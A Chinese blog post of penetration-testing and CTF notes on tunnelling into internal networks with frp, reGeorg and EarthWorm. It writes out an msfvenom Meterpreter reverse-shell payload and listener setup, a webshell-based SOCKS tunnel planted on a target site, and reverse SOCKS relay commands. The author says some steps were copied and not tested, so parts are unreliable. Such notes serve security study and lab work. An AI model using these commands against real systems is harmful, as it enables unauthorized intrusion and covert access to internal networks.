内网穿透流量转发

内网穿透流量转发

在进行渗透测试或者一些CTF题目时经常会遇到目标在内网或者不能直接访问的情况,这时候就需要将我们的流量代理进目标内网,记录下方法。

frp端口转发

使用frp将本地kail的端口映射到公网的端口上,这样在对公网机器进行反弹shell的时候,就可以将要反弹的地址改为公网对应的地址和端口,就相当于反弹到本地的kail端口上。这里说两种方法1.使用frp, frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。

  • 下载frp可执行包
wget https://github.com/fatedier/frp/releases/download/v0.32.0/frp_0.32.0_linux_amd64.tar.gz
  • 解压
tar zxf frp_0.32.0_linux_amd64.tar.gz
  • 进入文件
cd frp_0.32.0_linux_amd64/

1.配置frp服务端

frp服务端需要配置frps.ini,也就是你有公网ip的vps上

%title插图%num

启动:./frps -c frps.ini

2.配置frp客户端

server_addr为公网ip,server_port为服务端和客户端通信端口,type是协议类型,local_ip这个不需要去该,默认127.0.0.1,local_port是你要映射出去的的端口,remote_port是你vps去接受的端口,custom_domains是域名,可以去云服务器控制台那设置域名解析,也可以直接用一级域名。

%title插图%num

启动:./frps -c frps.ini

这里我在本地的kali上拉了个docker在9090端口上,尝试利用公网去访问本地kali机子9090的服务

%title插图%num

客户端启动:

%title插图%num

如果出现下面报错,可以尝试去把安全组端口放行了,如果有宝塔面板的,要去宝塔面板里面方行才有用

%title插图%num

服务端启动:

%title插图%num

代理成功:

%title插图%num

使用公网ip域名访问服务成功:

%title插图%num

3.msf反弹shell

[shell]
type = tcp
local_ip = 127.0.0.1
local_port = 1234
remote_port = 1234
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=vpsip LPORT=1234 -f elf > shell.elf

公网服务器执行
use exploit/multi/handler

set PAYLOAD <Payload name>

set LHOST <LHOST value>

set LPORT <LPORT value>

run

本地的msf就会收到反弹的shell

%title插图%num

reGeorg+Proxifier流量代理

把内网服务器的端口通过 http/https 隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。它利用 webshell 建立一个 socks 代理进行内网穿透,服务器必须支持 aspx、php 或 jsp 这些 web 程序中的一种。

将tunnel.nosocket.php放到web服务站点下

%title插图%num

Georg says, 'All seems fine',表示脚本运行正常

(1)reGeorg 需要Python2.7,还需要urllib3模块的支持,然后执行

python reGeorgSocksProxy.py -u http://154.8.144.57:10000/tunnel.nosocket.php -p 10001

%title插图%num

(2)再打开Proxifier代理工具设置代理:Profile-proxy servers:设置:154.8.144.57:10000 socks5代理

%title插图%num

注意配置代理规则时将python.exe设置为direct模式

%title插图%num

ew+浏览器设置Socks5代理穿透目标内网

1、正向socks v5服务器 【适用于目标机拥有一个外网IP】
服务器端执行以下命令:

ew.exe -s ssocksd -l 888

说明:服务器开启端口为888,SOCKS的代理。然后使用sockscap64添加这个IP的代理就可以使用了。
2、反弹socks v5服务器 【适用于目标机器没有公网IP,但可访问内网资源】
本地执行以下命令:

ew.exe -s rcsocks -l 1008 -e 888

说明:该命令的意思是在我们公网VPS上添加一个转接隧道,把1080端口收到的代理请求转交给888端口。
服务器端执行以下命令:

ew.exe -s rssocks -d 2.2.2.2 -e 888

说明:该命令的意思是在服务器上启动SOCKS V5服务,并反弹到IP地址为2.2.2.2的服务器888端口上。

可以浏览器设置Socks5代理或者kali通过proxychains代理来访问目标内网服务
Chrome浏览器设置Socks5代理(其他浏览器同理)

%title插图%num

Reference

https://www.cnblogs.com/Xy--1/p/13475299.html

最近累的一批,有些东西没测好,就随便抄了下大概怎么用的,有时间实战的时候玩玩,继续补充,或者比赛做题遇到再来补充吧。。。。。。

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇